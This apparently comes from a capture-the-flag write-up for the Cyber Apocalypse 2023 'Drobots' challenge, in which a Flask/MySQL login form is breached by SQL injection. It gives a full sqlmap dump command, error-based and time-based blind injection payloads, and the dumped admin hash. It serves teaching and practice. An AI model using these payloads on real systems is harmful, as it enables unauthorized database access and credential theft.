Cyber Apocalypse 2023


Solved by Legend

Challenge description

Pandora’s latest mission as part of her reconnaissance training is to infiltrate the Drobots firm that was suspected of engaging in illegal activities. Can you help pandora with this task?

In this challenge the website is showing a login page.

Since no other info was there or in the source code of the page I checked the docker config file.

The website is a Flask application running on MySQL so I thought of SQL Injection cand be done. Here I found interesting thing that in config.py file they have provided the database information.

Also in the database.py also they have given the hint that the input is not sanitized. The logic of the database is that we need the token of the password to login. So if we can find the token we can login.

Then I saved the login request and gave it to sqlmap though which I was able to extract the details.

sqlmap -r ./req --dbms=mysql -D drobots -T users --dump

Parameter: JSON username ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: {"username":"a"="a" AND (SELECT 5866 FROM(SELECT COUNT(*),CONCAT(0x7162717071,(SELECT (ELT(5866=5866,1))),0x716a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "a"="a","password":"a"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"username":"a"="a" AND (SELECT 4022 FROM (SELECT(SLEEP(5)))iMan) AND "a"="a","password":"a"}

| id | password                         | username |
| 1  | 67772d6e54bc393a6f67e16bac3f83da | admin    |

Once logged in we get the flag.

Published on : 27 Mar 2023